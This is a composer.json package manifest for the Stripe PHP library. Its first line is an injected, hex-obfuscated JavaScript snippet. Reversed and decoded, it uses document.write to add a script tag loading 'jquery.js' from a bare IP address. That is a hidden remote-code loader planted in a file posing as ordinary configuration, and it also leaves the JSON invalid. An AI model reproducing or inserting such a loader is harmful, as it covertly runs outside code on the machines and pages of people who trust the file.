var _0xc790=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xc790[5]](_0xc790[4][_0xc790[3]](_0xc790[0])[_0xc790[2]]()[_0xc790[1]](_0xc790[0])){
  "name": "stripe/stripe-php",
  "description": "Stripe PHP Library",
  "keywords": [
    "stripe",
    "payment processing",
    "api"
  ],
  "homepage": "https://stripe.com/",
  "license": "MIT",
  "authors": [
    {
      "name": "Stripe and contributors",
      "homepage": "https://github.com/stripe/stripe-php/contributors"
    }
  ],
  "require": {
    "php": ">=5.3.3",
    "ext-curl": "*",
    "ext-json": "*",
    "ext-mbstring": "*"
  },
  "require-dev": {
    "phpunit/phpunit": "~4.0",
    "satooshi/php-coveralls": "~0.6.1",
    "squizlabs/php_codesniffer": "~2.0"
  },
  "autoload": {
    "psr-4": { "Stripe\\" : "lib/" }
  },
  "extra": {
    "branch-alias": {
      "dev-master": "2.0-dev"
    }
  }
}
